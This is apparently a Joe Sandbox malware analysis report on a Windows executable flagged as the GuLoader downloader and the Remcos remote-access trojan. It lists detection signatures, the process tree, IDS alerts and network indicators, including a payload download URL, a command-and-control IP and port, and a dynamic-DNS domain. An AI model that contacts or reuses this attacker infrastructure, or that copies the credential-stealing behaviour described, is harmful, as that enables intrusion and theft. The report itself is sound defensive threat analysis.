Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SMGS-RCDU5010031.exe

Overview

General Information

Sample Name:SMGS-RCDU5010031.exe
Analysis ID:1330791
MD5:b434372e36a7d17bc61c8062bbc14015
SHA1:1e28e9114efdf6bd2a9e0e96cd69b046abf94315
SHA256:b94541afbfc65ad19aa72f3c547c65c0e0e6e706c7cd18c31c80efe501d28346
Infos:

Detection

GuLoader, Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Yara detected GuLoader
Snort IDS alert for network traffic
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Remcos RAT
Multi AV Scanner detection for dropped file
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Tries to harvest and steal browser information (history, passwords, etc)
Installs a global keyboard hook
Writes to foreign memory regions
Contains functionality to modify clipboard data
Yara detected WebBrowserPassView password recovery tool
C2 URLs / IPs found in malware configuration
Tries to steal Instant Messenger accounts or passwords
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Sleep loop found (likely to delay execution)
Detected potential crypto function
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Abnormal high CPU Usage
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
Creates files inside the system directory
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to call native functions
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Detected TCP or UDP traffic on non-standard ports
PE / OLE file has an invalid certificate
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64native
  • SMGS-RCDU5010031.exe (PID: 1508 cmdline: C:\Users\user\Desktop\SMGS-RCDU5010031.exe MD5: B434372E36A7D17BC61C8062BBC14015)
    • wab.exe (PID: 4672 cmdline: C:\Users\user\Desktop\SMGS-RCDU5010031.exe MD5: 251E51E2FEDCE8BB82763D39D631EF89)
      • wab.exe (PID: 8112 cmdline: C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\uhrhlaw MD5: 251E51E2FEDCE8BB82763D39D631EF89)
      • wab.exe (PID: 1964 cmdline: C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ebwamkguuyj MD5: 251E51E2FEDCE8BB82763D39D631EF89)
      • wab.exe (PID: 6620 cmdline: C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\gdbsndrnigbudr MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: GuLoader

{"Payload URL": "http"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\paqlgkfs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.12043367453.0000000000627000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_GuLoader_3Yara detected GuLoaderJoe Security
      00000002.00000002.16922298263.0000000006B51000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000000.00000002.12044516719.0000000002BC1000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          00000002.00000002.16907433078.00000000030B1000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            Process Memory Space: SMGS-RCDU5010031.exe PID: 1508JoeSecurity_GuLoader_3Yara detected GuLoaderJoe Security
              Click to see the 3 entries

              Sigma Signatures

              No Sigma rule has matched

              Snort Signatures

              Timestamp:192.168.11.2077.238.121.25050036802855192 10/23/23-20:39:41.494599
              SID:2855192
              Source Port:50036
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.11.2094.156.6.2535003724022032776 10/23/23-20:39:45.144854
              SID:2032776
              Source Port:50037
              Destination Port:2402
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:94.156.6.253192.168.11.202402500372032777 10/23/23-20:46:08.903547
              SID:2032777
              Source Port:2402
              Destination Port:50037
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for URL or domain
              Source: http://kapsnovin.com/KvGfOfeyMpEaqpzI164.binAvira URL Cloud: Label: malware
              Found malware configuration
              Source: 00000002.00000002.16935655865.0000000037561000.00000040.00001000.00020000.00000000.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "http"}
              Multi AV Scanner detection for submitted file
              Source: SMGS-RCDU5010031.exeReversingLabs: Detection: 42%
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000002.00000002.16922298263.0000000006B51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 4672, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\paqlgkfs.dat, type: DROPPED
              Multi AV Scanner detection for dropped file
              Source: C:\Users\user\AppData\Local\Temp\Skyggelgningen\Etpartisystemers.exeReversingLabs: Detection: 42%
              Source: SMGS-RCDU5010031.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\paqlgkfs.datJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Temp\gdbsndrnigbudrJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Temp\ebwamkguuyjJump to behavior
              Source: C:\Users\user\Desktop\SMGS-RCDU5010031.exeCode function: 0_2_00405841 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405841
              Source: C:\Users\user\Desktop\SMGS-RCDU5010031.exeCode function: 0_2_00406393 FindFirstFileW,FindClose,0_2_00406393
              Source: C:\Users\user\Desktop\SMGS-RCDU5010031.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 2_2_375610F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,2_2_375610F1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 2_2_37566580 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA,2_2_37566580
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0040AE51 FindFirstFileW,FindNextFileW,4_2_0040AE51
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_00407C87 FindFirstFileA,FindNextFileA,strlen,strlen,5_2_00407C87
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,6_2_00407898

              Networking

              barindex
              Snort IDS alert for network traffic
              Source: TrafficSnort IDS: 2855192 ETPRO TROJAN GuLoader Encoded Binary Request M2 192.168.11.20:50036 -> 77.238.121.250:80
              Source: TrafficSnort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.11.20:50037 -> 94.156.6.253:2402
              Source: TrafficSnort IDS: 2032777 ET TROJAN Remcos 3.x Unencrypted Server Response 94.156.6.253:2402 -> 192.168.11.20:50037
              Uses dynamic DNS services
              Source: unknownDNS query: name: ourt2949aslumes9.duckdns.org
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: http
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /KvGfOfeyMpEaqpzI164.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: kapsnovin.comCache-Control: no-cache
              Source: Joe Sandbox ViewASN Name: NET1-ASBG NET1-ASBG
              Source: Joe Sandbox ViewASN Name: ASIATECHIR ASIATECHIR
              Source: Joe Sandbox ViewIP Address: 94.156.6.253 94.156.6.253
              Source: Joe Sandbox ViewIP Address: 77.238.121.250 77.238.121.250
              Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
              Source: global trafficTCP traffic: 192.168.11.20:50037 -> 94.156.6.253:2402
              Source: wab.exe, 00000002.00000002.16922298263.0000000006B2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/
              Source: wab.exe, 00000002.00000003.12062619602.0000000006B7E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000002.00000003.12062721777.0000000006B81000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000002.00000002.16922298263.0000000006B16000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000002.00000002.16922298263.0000000006B43000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000002.00000002.16922298263.0000000006B51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
              Source: wab.exe, 00000002.00000002.16922298263.0000000006B51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpEd
              Source: wab.exe, 00000002.00000002.16922298263.0000000006B51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gphx
              Source: wab.exe, 00000002.00000002.16922298263.0000000006B51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpl
              Source: wab.exe, 00000002.00000002.16922298263.0000000006B51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpmd
              Source: wab.exe, 00000002.00000002.16922298263.0000000006B16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpn.net/son.gpp.dll
              Source: wab.exe, 00000002.00000002.16934552268.00000000364B0000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 00000002.00000002.16922298263.0000000006B16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kapsnovin.com/KvGfOfeyMpEaqpzI164.bin
              Source: wab.exe, 00000002.00000002.16922298263.0000000006B16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kapsnovin.com/KvGfOfeyMpEaqpzI164.binJ
              Source: wab.exe, 00000002.00000002.16934552268.00000000364B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://kapsnovin.com/KvGfOfeyMpEaqpzI164.binMillIntunif-pid.com/KvGfOfeyMpEaqpzI164.bin
              Source: wab.exe, 00000002.00000002.16922298263.0000000006B16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kapsnovin.com/KvGfOfeyMpEaqpzI164.bin_
              Source: wab.exe, 00000002.00000002.16922298263.0000000006B16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kapsnovin.com/KvGfOfeyMpEaqpzI164.biny
              Source: SMGS-RCDU5010031.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: wab.exe, wab.exe, 00000006.00000002.12095725931.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
              Source: wab.exe, wab.exe, 00000006.00000002.12095725931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000006.00000002.12096878380.000000000312D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com
              Source: wab.exe, 00000006.00000002.12095990427.000000000078C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com/
              Source: wab.exe, 00000006.00000002.12096878380.000000000312D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.comata
              Source: wab.exe, 00000002.00000002.16935529143.0000000037530000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000006.00000002.12095725931.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
              Source: wab.exe, 00000002.00000002.16935529143.0000000037530000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000006.00000002.12095725931.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
              Source: wab.exe, 00000004.00000002.12129302860.000000000059B000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
              Source: wab.exe, 00000006.00000002.12095725931.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
              Source: wab.exe, 00000004.00000003.12123400386.00000000046DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2542116.fls.doub
              Source: wab.exe, 00000004.00000003.12123467111.00000000046DA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12123597367.00000000046DA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12123700609.00000000046DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2542116.fls.doubXXO
              Source: wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2542116.fls.double
              Source: wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2542116.fls.doublecli
              Source: wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activ
              Source: wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activi
              Source: wab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chrom0;ord=8672137916610;
              Source: wab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12123198637.00000000046DA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12119839410.00000000046D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=37393684334
              Source: wab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7209567
              Source: wab.exe, 00000004.00000003.12117762141.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117950906.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117881357.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117642956.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117504774.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12118010524.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117826187.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117417668.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12119500072.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117702946.0000000004EC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://acdn.adnxs.com/dmp/async_usersync.html?gdpr=1&gdpr_consent=CPM7kC1PM7kC1AcABBENBQCsAP_AAELAA
              Source: wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://adservice.google.co.
              Source: wab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3739368433491;gt
              Source: wab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3739368433491;gtm=
              Source: wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://capturemedia-assets.com/ig-bank/ad-engagement/startAnimation/main/index.html
              Source: wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contextual.med
              Source: wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contextual.medi
              Source: wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contextual.media.net/check
              Source: wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contextual.media.net/checks
              Source: wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contextual.media.net/checksync.php
              Source: wab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
              Source: wab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
              Source: wab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
              Source: wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eb2.3lif
              Source: wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eb2.3lift.com/sync
              Source: wab.exe, 00000004.00000003.12115362208.0000000004EC1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eb2.3lift.com/sync?
              Source: wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://get.a
              Source: wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://get3.adobe
              Source: wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://get3.adobe.co
              Source: wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.co
              Source: wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/pagea
              Source: wab.exe, 00000004.00000003.12119500072.0000000004EC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/pagead/ads?gdpr=1&gdpr_consent=CPM7kC1PM7kC1AcABBENBQCsAP_AAELAA
              Source: wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/pagead/drt/s?v=r20120211
              Source: wab.exe, 00000004.00000003.12118574079.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117762141.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12118538217.00000000046CD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12118680474.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117950906.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12118788842.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117881357.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12118627581.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117642956.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12127760939.00000000046C1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117504774.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12118010524.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117826187.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12118733760.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117702946.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12118480673.0000000004EC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/pagead/drt/s?v=r20120211https://googleads.g.doubleclick.net/page
              Source: wab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ib.adnxs.com/async_usersync_file
              Source: wab.exe, 00000004.00000002.12129302860.0000000000592000.00000004.00000010.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12127224881.00000000046D4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12127126257.00000000046C5000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000002.12130749697.0000000004EDC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
              Source: wab.exe, 00000004.00000003.12127224881.00000000046D4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12127126257.00000000046C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
              Source: wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsign
              Source: wab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117826187.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117417668.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12118733760.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117107256.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117029806.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12127921633.00000000046BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117702946.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12118480673.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12127977949.00000000046BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12128266971.00000000046BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1632306842&rver=7.0.6730.0&wp=l
              Source: wab.exe, 00000004.00000003.12118538217.00000000046CD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12116911090.00000000046CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srfhttps://www.google.com/pagead/drt/uihttps://www.google.com/recaptcha
              Source: wab.exe, 00000004.00000003.12115443311.00000000046D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srfwa=wsignin1.0&rpsnv=13&checkda=1&ct=1632306842&rver=7.0.6730.0&wp=lb
              Source: wab.exe, 00000004.00000003.12127224881.00000000046D4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12127126257.00000000046C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
              Source: wab.exeString found in binary or memory: https://login.yahoo.com/config/login
              Source: wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.offi
              Source: wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeap
